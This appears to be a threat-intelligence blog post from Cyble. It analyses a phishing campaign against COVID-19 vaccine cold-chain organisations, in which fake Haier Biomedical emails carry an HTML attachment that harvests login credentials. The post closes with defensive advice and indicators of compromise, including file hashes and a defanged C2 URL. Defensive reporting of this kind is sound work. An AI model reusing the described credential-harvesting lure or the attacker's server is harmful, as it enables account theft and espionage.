As pharmaceuticals across the world race towards a vaccine, cybercrime continues to thrive in the underbelly of the Internet. In forums on the dark web, criminals continue to trade enormous repositories of critical medical data gathered through unauthorized means. As COVID-19 continues to dominate headlines, confidential vaccine research data generates enough monetization opportunities for cybercriminals. In addition to the COVID-19 databases containing confidential PII being leaked on the Internet, one of the critical security concerns is the immense cold chain logistics of the vaccine.
Recently, IBM warned against cybercriminals targeting the distribution network of Covid-19 vaccines through a campaign that is believed to have started in September 2020. The hacker activity uncovered by IBM has shed light on a global phishing campaign specifically designed to target members of the Cold Chain Equipment Optimisation Platform (CCEOP) and with signs of being a state-sponsored incident. As per a report by the Guardian, organizations across six countries were sent emails containing malicious attachments. These emails purported to be from Haier Biomedical, a UNICEF program member for strengthening vaccine supply chains. Incidents such as these underline the pressing need for cybersecurity rigour at every stage in the COVID-19 vaccine supply chain.
More recently, Cyble research observed a few additional indicators and emails with the subject posing as a Draft of Contract related to the CCEOP and Vaccine Program. This phishing email masquerades as a credible email communication from Haier Biomedical and is targeted at Kraeber & Co., as shown in the image below.
On opening the malicious HTML attachment, the user is prompted to submit login credentials for viewing PDF content, as depicted in the figure below. Our research indicates a malicious ActiveX component that automatically runs in the background as soon as the user enables the document security control. This type of ‘Precision Targeting’ involves advanced phishing attacks that are difficult to detect and takedown by security organizations.
The attached HTML page has a malicious ActiveX function that is used to send the harvested credentials to the hacker’s server using a simple POST request, as shown below.
The victims’ harvested credentials may be used to gain unauthorized access and conduct further cyber espionage activities. The cyber adversary may use the credentials to gain access to the targeted infrastructure and steal confidential information related to the COVID-19 vaccine research and delivery. These sophisticated phishing campaigns may also lead to further damages such as potential data breaches and undetected supply chain attacks.
As countries prepare for the availability and effective distribution of the vaccine in the near future, there is a raising need for cyber defences at every step of the vaccine supply chain. With cyberattacks on the vaccine cold chain emerging from all corners, organizations are expected to ensure preparedness for addressing the potential challenges that may arise in the future.
Furthermore, our researchers noted that the vaccine is now being sold in various darkweb marketplaces. Considering the limited supply of these vaccines, it is expected that they will be traded. It should be noted that the medical and health risks related to any alleged medicine or vaccine can be dangerous and lethal. We DO NOT recommend users to make any direct or indirect purchases.
Security Measures:
This phishing campaign is a clear indication that threat actors are shifting their focus on the complex logistical network associated with the R&D and distribution of the vaccine value chain. To counter the impact of cyberattacks targeted towards the COVID-19 vaccine supply chain, here are a few security measures that organizations can adopt.
- Validating third-parties and ensuring that they have the necessary level of cyber defences
- Never clicking on unverified/unidentified links
- Refraining from opening email attachments before validating their authenticity
- Using security software and keeping it updated
- Training employees on cybersecurity through cyber literacy programs
- Periodically conducting third-party/suppliers risk assessment
Indicators of Compromise (IOCs)
| SHA256 Hashes |
| 18D368E5EE1BBB9B7311E353CFD5475D772E8DF6C4AA1C79B41800F07059B761 |
| 3F0CA8BF1382ACB68E303F2135ED01C595122927DEF9A40E70C0AA8CBDDF7130 |
| E735ABD2DA75D8782A3828BC31B2C99930058CEBCF73B093D8C7A4139BF06C93 |
| 07DBE854A34E61349ADCC97DD3E2EB5A9158E02568BAE3E2AAE3859AEEB5B8A9 |
C2 URLs
hxxps://roud3servers[.]tk/next[.]php
About Cyble
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.io.